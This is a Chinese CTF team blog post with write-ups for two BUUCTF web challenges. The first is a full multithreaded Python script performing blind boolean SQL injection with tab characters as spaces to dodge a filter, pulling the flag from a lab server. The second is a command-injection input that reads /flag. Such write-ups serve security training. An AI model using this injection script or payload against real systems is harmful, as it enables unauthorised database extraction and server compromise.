buuctf Hack World & ctf473831530_2018_web_virink_web - CDUSEC内部博客

buuctf Hack World & ctf473831530_2018_web_virink_web

分类栏目: WEB

15℃

jsonf 发布于 发表评论

一、Hack World:

打开页面一看:

2.png


唉,难受,直接发payload,就不用解释了。。。


3.png


4.png

payload:

import requests,threading
z={}
def fast(n):
    R,L=126,30
    m=0
    while R>=L:
        m=(R+L)//2
        payload = '-1=(ascii(substr((select	flag	from	flag),{0},1))>{1})'.format(n,m)
        data = {"id": payload}

        if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php", data).content.decode('utf8'):
            payload = '-1=(ascii(substr((select	flag	from	flag),{0},1))={1})'.format(n, m+1)
            data = {"id": payload}

            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php", data).content.decode('utf8'):
                z[n] = chr(m + 1)
                print(chr(m + 1))
                break
            L=m+1
        else:
            payload = '-1=(ascii(substr((select	flag	from	flag),{0},1))={1})'.format(n, m - 1)
            data = {"id": payload}
            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php", data).content.decode('utf8'):
                z[n] = chr(m -1)
                print(chr(m - 1))
                break
            R=m-1

a=[]
for x in range(1,39):
    a.append(threading.Thread(target=fast,args=(x,)))
for x in a:
    x.start()
for x in a:
    x.join()
f=''
for x in range(1,39):
    f+=z[x]
print(f)

print('ok')



二、ctf473831530_2018_web_virink_web:

5.png

直接cmd=cat /flag >flag.txt:

6.png

这是猜对了flag在根目录下,第二种:

7.png



8.png

ok



  友情赞助
微信二维码
支付宝二维码
  选择分享方式

版权:若无特殊注明,本文皆为jsonf原创,转载请保留文章出处。

链接:buuctf Hack World & ctf473831530_2018_web_virink_web - http://cdusec.happyhacking.top/?post=78